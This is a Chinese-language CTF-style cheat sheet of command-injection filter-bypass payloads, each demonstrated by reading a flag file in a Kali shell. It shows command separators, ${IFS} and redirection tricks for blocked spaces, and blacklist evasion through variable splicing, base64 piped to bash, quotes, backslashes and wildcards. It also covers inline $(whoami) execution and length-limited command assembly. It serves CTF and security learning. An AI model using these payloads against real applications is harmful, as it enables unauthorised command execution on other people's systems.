一、常见拼接符

| 直接执行后面的语句 & 前面和后面命令都要执行，无论前面真假 || 如果前面命令是错的执行后面的命令；否则只执行前面的语句 && 如果前面为假，后面的命令也不执行；如果前面为真则执行两条命令 ; Linux有效，前面和后面命令都要执行

二、过滤空格绕过无过滤

2.1、无过滤  root@kali:~# cat${IFS}flag.txt flag{a89da5faw8f4s5fd184d}  2.2、${IFS} 用法1： root@kali:~# cat${IFS}flag.txt flag{a89da5faw8f4s5fd184d}  用法2： root@kali:~# cat${IFS}$1flag.txt flag{a89da5faw8f4s5fd184d}  用法3： root@kali:~# cat$IFS$1flag.txt flag{a89da5faw8f4s5fd184d}  2.3、重定向符（<>）  用法1： root@kali:~# cat<>flag.txt flag{a89da5faw8f4s5fd184d}  用法2： root@kali:~# cat<flag.txt flag{a89da5faw8f4s5fd184d}  2.4、%09（需要php环境）

三、黑名单绕过

3.1、拼接  root@kali:~# a=c;b=at;c=fl;d=ag.txt;$a$b $c$d flag{a89da5faw8f4s5fd184d}    3.2、Base64编码  root@kali:~# echo "cat flag.txt"|base64               //这个在本地执行加密 flag{a89da5faw8f4s5fd184d} root@kali:~# `echo "Y2F0IGZsYWcudHh0Cg=="|base64 -d`   //注意两个反引号 flag{a89da5faw8f4s5fd184d} root@kali:~# echo "Y2F0IGZsYWcudHh0Cg=="|base64 -d|bash //第二种执行方法，不需要反引号 flag{a89da5faw8f4s5fd184d}   3.3、单引号、双引号  root@kali:~# c""at fla''g.txt flag{a89da5faw8f4s5fd184d}   3.4、反斜杠  root@kali:~# c\at fl\ag.\txt flag{a89da5faw8f4s5fd184d}   3.5、$1、$2、$@  root@kali:~# c$1at f$2lag$@.txt flag{a89da5faw8f4s5fd184d}

四、读文件命令过滤

more:一页一页的显示档案内容  less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页  head:查看头几行  tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示  tail:查看尾几行  nl：显示的时候，顺便输出行号  od:以二进制的方式读取档案内容  vi:一种编辑器，这个也可以查看  vim:一种编辑器，这个也可以查看  sort:可以查看  uniq:可以查看  file -f:报错出具体内容

五、通配符绕过

root@kali:~# /???/?at flag flag{a89da5faw8f4s5fd184d} root@kali:~# /???/?[a][t] ?''?''?''?''?''?''?''?'' flag{a89da5faw8f4s5fd184d}

六、内联绕过

root@kali:~# echo "xxx`whoami`" xxxroot root@kali:~# echo "xxx$(whoami)" xxxroot

七、绕过限制

root@kali:~# c\  > at f\ > la\ > g.txt > flag{a89da5faw8f4s5fd184d} > root@kali:~# echo "xxx$(whoami)" > xxxroot  既然可以这样那我们是不是可以在某些限制长度的情况下执行命令，将命令一条一条输入一个文本中再执行，尝试一下  root@kali:~# echo "ca\\">cmd root@kali:~# echo "t\\">>cmd root@kali:~# echo " fl\\">>cmd root@kali:~# echo "ag.txt">>cmd root@kali:~# cat cmd ca\ t\ fl\ ag.txt root@kali:~# sh cmd flag{a89da5faw8f4s5fd184d}